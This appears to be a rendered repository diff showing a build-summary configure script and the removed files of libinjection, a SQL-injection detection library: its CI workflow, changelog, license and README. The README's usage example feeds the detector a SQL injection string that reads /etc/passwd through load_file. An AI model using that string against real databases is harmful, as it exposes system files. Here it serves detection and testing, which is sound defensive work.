if test "x$MAXMIND_FOUND" = "x1"; then
|
||||
echo " * (MaxMind) v${MAXMIND_VERSION}"
|
||||
echo " ${MAXMIND_DISPLAY}"
|
||||
fi
|
||||
if test "x$GEOIP_FOUND" = "x1"; then
|
||||
echo " * (GeoIP) v${GEOIP_VERSION}"
|
||||
echo " ${GEOIP_DISPLAY}"
|
||||
fi
|
||||
fi
|
||||
if test "x$GEOIP_FOUND" = "x2" && test "x$MAXMIND_FOUND" = "x2"; then
|
||||
echo " + GeoIP/MaxMind ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## LibCurl
|
||||
if test "x$CURL_FOUND" = "x0"; then
|
||||
echo " + LibCURL ....not found"
|
||||
fi
|
||||
if test "x$CURL_FOUND" = "x1"; then
|
||||
echo -n " + LibCURL ....found "
|
||||
if ! test "x$CURL_VERSION" = "x"; then
|
||||
echo "v${CURL_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${CURL_DISPLAY}"
|
||||
fi
|
||||
if test "x$CURL_FOUND" = "x2"; then
|
||||
echo " + LibCURL ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## YAJL
|
||||
if test "x$YAJL_FOUND" = "x0"; then
|
||||
echo " + YAJL ....not found"
|
||||
fi
|
||||
if test "x$YAJL_FOUND" = "x1"; then
|
||||
echo -n " + YAJL ....found "
|
||||
if ! test "x$YAJL_VERSION" = "x"; then
|
||||
echo "v${YAJL_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${YAJL_DISPLAY}"
|
||||
fi
|
||||
if test "x$YAJL_FOUND" = "x2"; then
|
||||
echo " + YAJL ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## LMDB
|
||||
if test "x$LMDB_FOUND" = "x0"; then
|
||||
echo " + LMDB ....not found"
|
||||
fi
|
||||
if test "x$LMDB_FOUND" = "x1"; then
|
||||
echo -n " + LMDB ....found "
|
||||
if ! test "x$LMDB_VERSION" = "x"; then
|
||||
echo "v${LMDB_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${LMDB_DISPLAY}"
|
||||
fi
|
||||
if test "x$LMDB_FOUND" = "x2"; then
|
||||
echo " + LMDB ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## libxml2
|
||||
if test "x$LIBXML2_FOUND" = "x0"; then
|
||||
echo " + LibXML2 ....not found"
|
||||
fi
|
||||
if test "x$LIBXML2_FOUND" = "x1"; then
|
||||
echo -n " + LibXML2 ....found "
|
||||
if ! test "x$LIBXML2_VERSION" = "x"; then
|
||||
echo "v${LIBXML2_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${LIBXML2_DISPLAY}"
|
||||
fi
|
||||
if test "x$LIBXML2_FOUND" = "x2"; then
|
||||
echo " + LibXML2 ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## SSDEEP
|
||||
if test "x$SSDEEP_FOUND" = "x0"; then
|
||||
echo " + SSDEEP ....not found"
|
||||
fi
|
||||
if test "x$SSDEEP_FOUND" = "x1"; then
|
||||
echo -n " + SSDEEP ....found "
|
||||
if ! test "x$SSDEEP_VERSION" = "x"; then
|
||||
echo "v${SSDEEP_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${SSDEEP_DISPLAY}"
|
||||
fi
|
||||
if test "x$SSDEEP_FOUND" = "x2"; then
|
||||
echo " + SSDEEP ....disabled"
|
||||
fi
|
||||
|
||||
## LUA
|
||||
if test "x$LUA_FOUND" = "x0"; then
|
||||
echo " + LUA ....not found"
|
||||
fi
|
||||
if test "x$LUA_FOUND" = "x1"; then
|
||||
echo -n " + LUA ....found "
|
||||
if ! test "x$LUA_VERSION" = "x"; then
|
||||
echo "v${LUA_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${LUA_DISPLAY}"
|
||||
fi
|
||||
if test "x$LUA_FOUND" = "x2"; then
|
||||
echo " + LUA ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## PCRE2
|
||||
if test "x$PCRE2_FOUND" = "x0"; then
|
||||
echo " + PCRE2 ....not found"
|
||||
fi
|
||||
if test "x$PCRE2_FOUND" = "x1"; then
|
||||
echo -n " + PCRE2 ....found "
|
||||
if ! test "x$PCRE2_VERSION" = "x"; then
|
||||
echo "v${PCRE2_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${PCRE2_DISPLAY}"
|
||||
fi
|
||||
if test "x$PCRE2_FOUND" = "x2"; then
|
||||
echo " + PCRE2 ....disabled"
|
||||
fi
|
||||
|
||||
echo " "
|
||||
echo " Other Options"
|
||||
if test $buildTestUtilities = true; then
|
||||
if test $debugLogs = true; then
|
||||
echo " + Test Utilities ....enabled"
|
||||
else
|
||||
echo " + Test Utilities ....partially"
|
||||
fi
|
||||
else
|
||||
echo " + Test Utilities ....disabled"
|
||||
fi
|
||||
if test $debugLogs = true; then
|
||||
echo " + SecDebugLog ....enabled"
|
||||
else
|
||||
echo " + SecDebugLog ....disabled"
|
||||
fi
|
||||
|
||||
if test "$aflFuzzer" = "true"; then
|
||||
echo " + afl fuzzer ....enabled"
|
||||
echo " ($FUZZ_CPPCFLAGS)"
|
||||
else
|
||||
echo " + afl fuzzer ....disabled"
|
||||
fi
|
||||
|
||||
if test "$buildExamples" = "true"; then
|
||||
echo " + library examples ....enabled"
|
||||
else
|
||||
echo " + library examples ....disabled"
|
||||
fi
|
||||
|
||||
if test "$buildParser" = "true"; then
|
||||
echo " + Building parser ....enabled"
|
||||
else
|
||||
echo " + Building parser ....disabled"
|
||||
fi
|
||||
|
||||
if test "$mutexPm" = "true"; then
|
||||
echo " + Treating pm operations as critical section ....enabled"
|
||||
else
|
||||
echo " + Treating pm operations as critical section ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
echo " "
|
||||
|
||||
|
||||
if test "$aflFuzzer" = "true"; then
|
||||
echo "WARNING: afl fuzzer was enabled. Make sure you are using the"
|
||||
echo " 'afl-clang-fast' as the compiler, otherwise the compilation"
|
||||
echo " will fail."
|
||||
echo " "
|
||||
echo " You can set the compiler using:"
|
||||
echo " "
|
||||
echo " $ export CXX=afl-clang-fast++ "
|
||||
echo " $ export CC=afl-clang-fast "
|
||||
echo " "
|
||||
fi
|
||||
|
|
@ -1,87 +0,0 @@
|
|||
name: CI
|
||||
|
||||
on:
|
||||
push:
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
cppcheck:
|
||||
runs-on: ubuntu-20.04
|
||||
name: cppcheck
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
name: checkout repo
|
||||
- name: Setup Dependencies
|
||||
run: |
|
||||
sudo apt-get update -y -qq
|
||||
sudo apt-get install cppcheck
|
||||
- name: cppcheck
|
||||
run: |
|
||||
cppcheck --std=c89 \
|
||||
--enable=all \
|
||||
--inconclusive \
|
||||
--suppress=variableScope \
|
||||
--suppress=missingIncludeSystem \
|
||||
--quiet \
|
||||
--error-exitcode=1 \
|
||||
--template='{file}:{line} {id} {severity} {message}' \
|
||||
.
|
||||
|
||||
clang-static:
|
||||
runs-on: ubuntu-20.04
|
||||
name: clang static check
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
name: checkout repo
|
||||
- name: make analyze
|
||||
run: make analyze
|
||||
working-directory: src
|
||||
env:
|
||||
CFLAGS: '-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror'
|
||||
|
||||
build-linux:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-20.04, ubuntu-18.04, ubuntu-16.04]
|
||||
platform: [x32, x64]
|
||||
compiler: [gcc, clang]
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Setup Dependencies
|
||||
run: |
|
||||
sudo apt-get update -y -qq
|
||||
sudo apt-get install valgrind
|
||||
- name: build
|
||||
run: make all
|
||||
- name: test
|
||||
run: make -e check
|
||||
- name: clean
|
||||
run: make clean
|
||||
- name: build pedantic
|
||||
run: make all
|
||||
env:
|
||||
CFLAGS: '-Wall -Wextra -Werror -pedantic -ansi -g -O1'
|
||||
- name: test valgrind
|
||||
run: make -e check
|
||||
env:
|
||||
VALGRIND: 'valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/home/runner/work/libinjection/libinjection/src/alpine.supp'
|
||||
|
||||
build-macos:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
matrix:
|
||||
os: [macos-10.15]
|
||||
compiler: [gcc, clang]
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: build
|
||||
run: make all
|
||||
- name: test
|
||||
run: make -e check
|
||||
- name: clean
|
||||
run: make clean
|
||||
- name: build pedantic
|
||||
run: make all
|
||||
env:
|
||||
CFLAGS: '-Wall -Wextra -Werror -pedantic -ansi -g -O1'
|
|
@ -1,46 +0,0 @@
|
|||
*~
|
||||
*.pyc
|
||||
*.dSYM
|
||||
c/#*
|
||||
*.plist
|
||||
*.info
|
||||
*.gch
|
||||
*.gcov
|
||||
|
||||
# gnu autotest
|
||||
*.trs
|
||||
|
||||
#aclocal.m4
|
||||
app.info
|
||||
autom4te.cache
|
||||
#compile
|
||||
config.h
|
||||
#config.h.in
|
||||
#config.guess
|
||||
config.log
|
||||
config.status
|
||||
#config.sub
|
||||
#configure
|
||||
configure.scan
|
||||
coverage_report
|
||||
#depcomp
|
||||
#install-sh
|
||||
#libtool
|
||||
#ltmain.sh
|
||||
#Makefile.in
|
||||
#m4
|
||||
#missing
|
||||
stamp-h1
|
||||
*~
|
||||
*.html
|
||||
*.log
|
||||
*.o
|
||||
*.la
|
||||
*.so*
|
||||
*.a
|
||||
.deps
|
||||
*.tar*
|
||||
*.zip
|
||||
*.lo
|
||||
*.gcno
|
||||
*.gcda
|
|
@ -1,2 +0,0 @@
|
|||
see CHANGELOG.md
|
||||
|
|
@ -1,288 +0,0 @@
|
|||
# NEXT
|
||||
|
||||
* [#126](/client9/libinjection/issues/126) oracle false negative
|
||||
* [#117](/client9/libinjection/issues/117) [#116](/client9/libinjection/issues/116) - overread in XSS
|
||||
* [#112](/client9/libinjection/issues/112) fix shared library on macOS
|
||||
* [#122](/client9/libinjection/issues/122) [#115](/client9/libinjection/issues/115) - false positive issue for XSS
|
||||
* [#113](/client9/libinjection/issues/113) save space in struct
|
||||
* [#126](/client9/libinjection/issues/126) add usage to sqli cli tool
|
||||
* [#125](/client9/libinjection/issues/125) many false positives
|
||||
* [#114](/client9/libinjection/issues/114) false negative with TSQL and "IF NOT" operation
|
||||
|
||||
# v3.9.2 - 2016-05-21
|
||||
|
||||
* Release of whatever changes have been made over the last 2.5 years.
|
||||
|
||||
# v3.9.1 - 2013-12-26
|
||||
|
||||
Day-After-Christmas Edition
|
||||
|
||||
* No functional changes
|
||||
* Code reverted to strict C90 style to allow builds on embedded systems, Windows and FreeBSD
|
||||
* For gcc this means `-std=c90 -pedantic`, which seems to simulate Windows behavior on Linux
|
||||
* Other minor style changes to header files.
|
||||
|
||||
|
||||
# v3.9.0 - 2013-11-29
|
||||
|
||||
Black Friday Edition
|
||||
|
||||
* Big API Change!! everything in `libinjection.h` is now `libinjection_sqli.h`. And a new super simple API is in `libinjection.h`
|
||||
* Improvements to folder to prevent bypasses using SQL types (casts). This eliminated about 400 fingerprints as well.
|
||||
* Blacklisted a very degenerate MySQL ODBC case, that is highly unlike to be used in 'real inputs'. thanks to @LightOS foreporting.. not clear who found it originally.
|
||||
* Over 400 unit tests now!
|
||||
* Compiles clean under clang with `-Weverything -Wno-padded` `-Wno-padded` is excluded since it's architecture dependant. See `clang.sh` to see how to invoke.
|
||||
* PHP documentation fixes, thanks @LightOS
|
||||
|
||||
# v3.8.0 - 2013-10-18
|
||||
|
||||
LAMP Special Edition: MySQL and PHP improvements
|
||||
|
||||
* [Issue #33](https://github.com/client9/libinjection/issues/54) Fixes MySQL in latin1-mode use of `%A0` as whitespace. This was tricky since `%A0` might be part of larger UTF-8 encoding as well. Or perhaps `%C2%A0` (utf-8 encoding) might be treated as whitespace. Fortunately, MySQL only seems to treat `%A0` as whitespace in latin1 mode. HT [@ru_raz0r](https://twitter.com/ru_raz0r)
|
||||
* Fixes to Lua testdriver and portability fixes
|
||||
* Much improved PHP build and test. It now uses `phpize` and builds and tests like a real module.
|
||||
* API CHANGE: the macro `LIBINJECTION_VERSION` has been replaced by `const char* libinjection_version()`. This allows us to increment the version number without having to regenerate SWIG (or other) bindings for minor releases.
|
||||
|
||||
NOTE:
|
||||
Pregenerated [SWIG](http://www.swig.org/) bindings are removed. You'll need to install SWIG before running `make`. SWIG is packaged on virtually every OS so this should not be a problem.
|
||||
|
||||
Here's why:
|
||||
|
||||
* Latest versions of swig appear to generate poor quality bindings for LUA and Python. Bugs are filed upstream [1341](https://sourceforge.net/p/swig/bugs/1341/), [1343](https://sourceforge.net/p/swig/bugs/1343/), [1345](https://sourceforge.net/p/swig/bugs/1345/). These are fixed or will be fixed in swig 3.0.0.
|
||||
* In addition, I've received a number of reports of generated code failing various static analysis
|
||||
* I can't triangulate which SWIG for which language for which OS will work for you
|
||||
* I may be switching to [libffi](http://cffi.readthedocs.org/) for python, and [luajit.ffi](http://luajit.org/ext_ffi.html) for lua(jit) in the future, anyways.
|
||||
|
||||
# v3.7.1 -- 2013-10-13
|
||||
|
||||
* Remove un-needed code
|
||||
|
||||
# v3.7.0 -- 2013-10-13
|
||||
|
||||
Major Release
|
||||
|
||||
* [Issue #54](https://github.com/client9/libinjection/issues/54): Add test vectors from [Arne Swinnen](http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/). Thanks [qerub@github](https://github.com/qerub)
|
||||
* Minor fingerprint update for [Issue #54](https://github.com/client9/libinjection/issues/54). I don't really think it's valid SQL but it's safe enough to detect without false positives.
|
||||
* [Issue #55](https://github.com/client9/libinjection/issues/55): Parse MS SQLSERVER use of \[brackets\] for column and table names. This is a big one that closes a lot of holes. Thanks [nroggle@github](https://github.com/nroggel)
|
||||
* [Issue #56](https://github.com/client9/libinjection/issues/56): fix buffer over-read. Thanks [safe3@github](https://github.com/Safe3) and [flily@github](https://github.com/flily)
|
||||
* Remove use of `-fstack-protector` as it breaks valgrind detecting memory problems
|
||||
Read more about it http://blog.client9.com/2013/10/12/gcc-valgrind-stackprotector.html
|
||||
* Fixed folding issue where `1,-sin(1))` would be folded as `1 (1)`
|
||||
* Add more test cases and improved test coverage to [98.8%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
|
||||
# v3.6.0 -- 2013-09-11
|
||||
* New PHP API
|
||||
* Big fingerprint update
|
||||
** about 500 new fingerprints added based on fuzzing tests by Reto Ischi
|
||||
** about 700 impossible, dead fingerprints removed
|
||||
** adding folding rule for "sqltype sqltype -> sqltype" since
|
||||
`select binary binary binary 1` is valid
|
||||
* Other minor fingerprints added
|
||||
* -maybe- API change as typedefs and structs were re-arranged for SWIG
|
||||
|
||||
# v3.5.3 -- 2013-08-25
|
||||
* Fingerprint update -- `BETWEEN` operation bypasses
|
||||
* Fingerprint update -- `ANY/SOME` quasi-function bypasses
|
||||
* Fixed issue with folding where `1-(2-3)` would fold to "nothing" instead of `1`
|
||||
* Improved test coverage to [98.0%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
* More adjustments to the PHP/MYSQL backtick to reduce false positives
|
||||
|
||||
# v3.5.2 -- 2013-08-21
|
||||
* Fingerprint update. Credit: Reto Ischi
|
||||
|
||||
# v3.5.1 -- 2013-08-21
|
||||
* found regression in handling of PHP/MySQL backticks. Tests added
|
||||
* Dead code removed.
|
||||
* Improved test coverage to [97.7%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
|
||||
# v3.5.0 -- 2013-08-21
|
||||
* Bug fix for libinjection_sqli_reset @brianrectanus
|
||||
https://github.com/client9/libinjection/pull/50
|
||||
* Non-critical parser fix for numbers with oracle's ending
|
||||
suffix. "SELECT 1FROM .." -> (SELECT, 1, FROM) not
|
||||
(SELECT, 1F, ROM)
|
||||
* Yet another fix for disambiguating Oracle's "f" suffix for numbers HT @LightOS
|
||||
* Better parsing of generated number forms of "10.e" and "10.10e"
|
||||
(these are actually table specifiers!) HT @LightOS
|
||||
* Change sizing of some static arrays to have a length >= 8
|
||||
For GCC based applications, this allows -fstack-protector to work
|
||||
and -Wstack-protector will now not emit errors.
|
||||
* Added '-fstack-protector-all -D_FORTIFY_SOURCE=2' to default CFLAGS.
|
||||
About 10% performance loss with -fstack-protector-all
|
||||
* Improvements in reducing false positives, HT modsecurity team
|
||||
* Add fingerprint, HT @FluxReiners
|
||||
* Support for parsing of old ODBC-style typing, e.g. 'select {foo 1};' (valid in MySQL)
|
||||
* Fix tokenization of "IF EXISTS(....", "IF NOT EXISTS(..."
|
||||
* Fi possible stack over-read, and improve detection of "sp_password" flag
|
||||
in short sqli HT modsecurity team
|
||||
|
||||
# v3.4.1 2013-07-18
|
||||
* Fingerprint update only HT @LightOS
|
||||
|
||||
# v3.4.0 2013-07-18
|
||||
|
||||
* Fix regression with COLLATE
|
||||
* Handle "procedure analyze" under MySQL
|
||||
* Make API most robust when setting flags
|
||||
* Add folding API
|
||||
* Add new all-C test driver to improve testing speed
|
||||
* Makefile cleanups
|
||||
* Fired Jenkins! Using in-house system.
|
||||
* Fixed bypass reported by @FluxReiners
|
||||
|
||||
# v3.3.0 2013-07-13
|
||||
|
||||
* change how backslash is handled to catch old MSSQL servers sqli
|
||||
See http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
|
||||
for details
|
||||
* Reworking of COLLATE to handle MySQL, TSQL types automatically
|
||||
* Handle bizarro world TSQL '\%1' which is parsed as "0 % 1"
|
||||
* Better stacked query detection, fixing some regressions
|
||||
* Folding improvements
|
||||
* False positive improvements
|
||||
|
||||
|
||||
# v3.2.0 2013-07-12
|
||||
|
||||
* Parse binary litterals "0b010101" used by at least mysql and pgsql
|
||||
* Add fingerprints '1&EUE', '1&EkU' to work around ambiguous parsing rules
|
||||
"-1.for" == '-1.f OR' vs. '-1. FOR' CREDIT @LightOS
|
||||
* Add parsing rules for COLLATION in MySQL, CREDIT @LightOS
|
||||
* Reduce false positives by removing all fingerprints that contained "sn"
|
||||
* Improvement in handling MySQL 'binary' quasi-operator/type
|
||||
* Improvements in folding
|
||||
* Removed dependency on SWIG for installing python module
|
||||
|
||||
# v3.1.0 2013-07-02
|
||||
|
||||
* Fix for parsing Oracle numeric literals
|
||||
* Fix for oracle whitespace with null char.
|
||||
* Add unusual SQL join types to keywords lists
|
||||
* Minor fixes to python API examples
|
||||
|
||||
# v3.0.0 2013-06-23
|
||||
|
||||
Big Release and Big Engine change. Highly recommend
|
||||
|
||||
* Numerous evasions and false positives fixed!
|
||||
* Tokenizer is now really dumb, and publically exposed. See `libinjection_sqli_tokenize`.
|
||||
* Folding engine completely rewritten to be simpler and easier to extend, debug, port.
|
||||
* MySQL `backticks` now handled correctly
|
||||
* @"var" and @'var' parsed correctly (mysql)
|
||||
* ":=" operator parsed correctly
|
||||
* non-ascii SQL variables and barewords handled correctly
|
||||
* less false positives and those that are false positives
|
||||
are more "indeterminate cases" and are only in a few
|
||||
fingerprints
|
||||
* autogeneration of fingerprints with trivial SQL variations
|
||||
* support for pgsql $ strings
|
||||
* support for oracle's q and nq strings
|
||||
* support for mysql's n strings
|
||||
* parsing stats exposed
|
||||
* new swig bindings for python and lua, with callbacks into original scripting
|
||||
language for accept/reject of fingerprints (i.e. manage fingerprints in
|
||||
script, not C code)
|
||||
* Improved parsing of various special cases in MySQL
|
||||
* Ban MySQL conditional comments. If we find them, it's marked as SQLi immediately.
|
||||
* Probably a bunch of other stuff too
|
||||
|
||||
# v2.0.4 2013-05-21 IMPORTANT
|
||||
|
||||
All users are advised to upgrade due to risk of DOS
|
||||
|
||||
## security
|
||||
* more fingerprints, more tests
|
||||
* Issue 34: fix infinite loop
|
||||
|
||||
# v2.0.3 2013-05-21
|
||||
|
||||
## security
|
||||
* Add variations on '1U(((', thanks @LightOS
|
||||
* Add automatically all variations on other cases of
|
||||
'parens padding'
|
||||
|
||||
# v2.0.2 2013-05-21
|
||||
|
||||
## security
|
||||
* Added fingerprint 'nU(kn' and variations, thanks to
|
||||
discussion with @ModSecurity .
|
||||
|
||||
# v2.0.1 2013-05-21
|
||||
|
||||
## security
|
||||
* Added fingerprint knknk, thanks @d0znpp
|
||||
|
||||
# v2.0.0 2013-05-17
|
||||
|
||||
Version 2 is more a software engineering release than SQLi.
|
||||
The API, the code, and filenames are improved for embedded
|
||||
use. Please see the README.md file for details on use.
|
||||
|
||||
## security
|
||||
|
||||
* Fix Issue30: detection of more small sqli forms with fingerprint "1c".
|
||||
* Fix Issue32: false positive of '*/*' of type 'oc' Thanks to @brianrectanus
|
||||
|
||||
## API Changes
|
||||
|
||||
BIG CHANGES
|
||||
|
||||
* File name changes. These are the only relevant files:
|
||||
* `c/libinjection.h`
|
||||
* `c/libinjection_sqli.c`
|
||||
* `c/libinjection_sqli_data.h`
|
||||
* `COPYING`
|
||||
* Just need to include `libinjection.h` and link with `libinjection_sqli_.c`
|
||||
* `sqlparse_private.h` and `sqli_fingerprints.h` are deprecated.
|
||||
Only use `#include "libinjection.h"`
|
||||
* API name changes `is_sqli` and `is_string_sqli` are now
|
||||
`libinjection_is_sqli` and `libinjection_is_string_sqli`
|
||||
* API change, `libinjection_is_sqli` now takes a 5th arg for callback data
|
||||
* API change, `libinjection_is_sqli` accepts `NULL` for arg4 and arg5
|
||||
in which case, a default lookup of fingerprints is used.
|
||||
* `sqlmap_data.json` now includes fingerprint information, so people making
|
||||
ports only need to parse one file.
|
||||
|
||||
## other
|
||||
|
||||
* Allow `clang` compiler (also in Jenkins, a build with clang and
|
||||
make-scan is done)
|
||||
* Optimizations should result in > 10% performance improvement
|
||||
for normal workloads
|
||||
* Add `sqlite3` special functions and keywords (since why not)
|
||||
|
||||
# v1.2.0 2013-05-06
|
||||
|
||||
## security
|
||||
* fix regression in detecting SQLi of type '1c'
|
||||
|
||||
##
|
||||
* improved documentation, comments, edits.
|
||||
|
||||
# v1.1.0 2013-05-04
|
||||
|
||||
## security
|
||||
|
||||
* Fix for nested c-style comments used by postgresql and transact-sql.
|
||||
Thanks to @Kanatoko for the report.
|
||||
* Numerous additions to SQL functions lists (in particular pgsql, transact-sql
|
||||
and ms-access functions)
|
||||
Thanks to Christoffer Sawicki (GitHub "qerub") for report on cut-n-paste error.
|
||||
Thanks to @ryancbarnett for reminder that MS-ACCESS exists ;-)
|
||||
* Adding of fingerprints to detect HPP attacks.
|
||||
* Algorihmically added new fingerprints to detect new _future_ sqli attacks. All of these
|
||||
new fingerprints have no been seen 'in the wild' yet.
|
||||
|
||||
## other
|
||||
|
||||
* Replaced BSD memmem with optimzed version. This eliminates all 3rd party code.
|
||||
* Added alpha python module (python setup.py install)
|
||||
* Added sqlparse_fingerprints.h and sqlparse_data.json to aid porting and embeddeding.
|
||||
* Added version number in sqlparse.h, based on
|
||||
http://www.python.org/dev/peps/pep-0386/#normalizedversion
|
||||
|
||||
# v1.0.0 2013-04-24
|
||||
|
||||
* retroactive initial release
|
||||
* all memory issues fixed
|
||||
|
|
@ -1,32 +0,0 @@
|
|||
Copyright (c) 2012-2016, Nick Galbreath
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are
|
||||
met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
|
||||
2. Redistributions in binary form must reproduce the above copyright
|
||||
notice, this list of conditions and the following disclaimer in the
|
||||
documentation and/or other materials provided with the distribution.
|
||||
|
||||
3. Neither the name of the copyright holder nor the names of its
|
||||
contributors may be used to endorse or promote products derived from
|
||||
this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
|
||||
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
|
||||
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
|
||||
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
|
||||
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
|
||||
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
|
||||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
|
||||
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
||||
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
|
||||
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
https://github.com/client9/libinjection
|
||||
http://opensource.org/licenses/BSD-3-Clause
|
|
@ -1,110 +0,0 @@
|
|||
|
||||
<img src="https://raw.githubusercontent.com/libinjection/libinjection/main/misc/libinjection.svg" width="70%">
|
||||
|
||||
![CI](https://github.com/libinjection/libinjection/workflows/CI/badge.svg)
|
||||
[![license](https://img.shields.io/badge/license-BSD_3--Clause-blue.svg?style=flat)](https://raw.githubusercontent.com/client9/libinjection/master/COPYING)
|
||||
|
||||
|
||||
|
||||
SQL / SQLI tokenizer parser analyzer. For
|
||||
|
||||
* C and C++
|
||||
* [PHP](https://libinjection.client9.com/doc-sqli-php)
|
||||
* [Python](https://libinjection.client9.com/doc-sqli-python)
|
||||
* [Lua](/lua)
|
||||
* [Java](https://github.com/jeonglee/Libinjection) (external port)
|
||||
* [LuaJIT/FFI] (https://github.com/p0pr0ck5/lua-ffi-libinjection) (external port)
|
||||
|
||||
See
|
||||
[https://www.client9.com/](https://www.client9.com/)
|
||||
for details and presentations.
|
||||
|
||||
Simple example:
|
||||
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <strings.h>
|
||||
#include <errno.h>
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
|
||||
int main(int argc, const char* argv[])
|
||||
{
|
||||
struct libinjection_sqli_state state;
|
||||
int issqli;
|
||||
|
||||
const char* input = argv[1];
|
||||
size_t slen = strlen(input);
|
||||
|
||||
/* in real-world, you would url-decode the input, etc */
|
||||
|
||||
libinjection_sqli_init(&state, input, slen, FLAG_NONE);
|
||||
issqli = libinjection_is_sqli(&state);
|
||||
if (issqli) {
|
||||
fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);
|
||||
}
|
||||
return issqli;
|
||||
}
|
||||
```
|
||||
|
||||
```
|
||||
$ gcc -Wall -Wextra examples.c libinjection_sqli.c
|
||||
$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
|
||||
sqli detected with fingerprint of 's&1UE'
|
||||
```
|
||||
|
||||
More advanced samples:
|
||||
|
||||
* [sqli_cli.c](/src/sqli_cli.c)
|
||||
* [reader.c](/src/reader.c)
|
||||
* [fptool](/src/fptool.c)
|
||||
|
||||
VERSION INFORMATION
|
||||
===================
|
||||
|
||||
See [CHANGELOG](/CHANGELOG) for details.
|
||||
|
||||
Versions are listed as "major.minor.point"
|
||||
|
||||
Major are significant changes to the API and/or fingerprint format.
|
||||
Applications will need recompiling and/or refactoring.
|
||||
|
||||
Minor are C code changes. These may include
|
||||
* logical change to detect or suppress
|
||||
* optimization changes
|
||||
* code refactoring
|
||||
|
||||
Point releases are purely data changes. These may be safely applied.
|
||||
|
||||
QUALITY AND DIAGNOSITICS
|
||||
========================
|
||||
|
||||
The continuous integration results at
|
||||
https://travis-ci.org/client9/libinjection tests the following:
|
||||
|
||||
- [x] build and unit-tests under GCC
|
||||
- [x] build and unit-tests under Clang
|
||||
- [x] static analysis using [clang static analyzer](http://clang-analyzer.llvm.org)
|
||||
- [x] static analysis using [cppcheck](https://github.com/danmar/cppcheck)
|
||||
- [x] checks for memory errors using [valgrind](http://valgrind.org/)
|
||||
|
||||
LICENSE
|
||||
=============
|
||||
|
||||
Copyright (c) 2012-2016 Nick Galbreath
|
||||
|
||||
Licensed under the standard [BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) open source
|
||||
license. See [COPYING](/COPYING) for details.
|
||||
|
||||
EMBEDDING
|
||||
=============
|
||||
|
||||
The [src](https://github.com/client9/libinjection/tree/master/src)
|
||||
directory contains everything, but you only need to copy the following
|
||||
into your source tree:
|
||||
|
||||
* [src/libinjection.h](/src/libinjection.h)
|
||||
* [src/libinjection_sqli.c](/src/libinjection_sqli.c)
|
||||
* [src/libinjection_sqli_data.h](/src/libinjection_sqli_data.h)
|
||||
* [COPYING](/COPYING)
|
||||
|
|
@ -1,33 +0,0 @@
|
|||
# libinjection release howto
|
||||
|
||||
Comments and improvements welcome.
|
||||
|
||||
## Update the internal version number
|
||||
|
||||
in `src/libinjection_sqli.c` edit the definition
|
||||
|
||||
```c
|
||||
#define LIBINJECTION_VERSION "3.9.1"
|
||||
```
|
||||
|
||||
## Update the CHANGELOG.md file
|
||||
|
||||
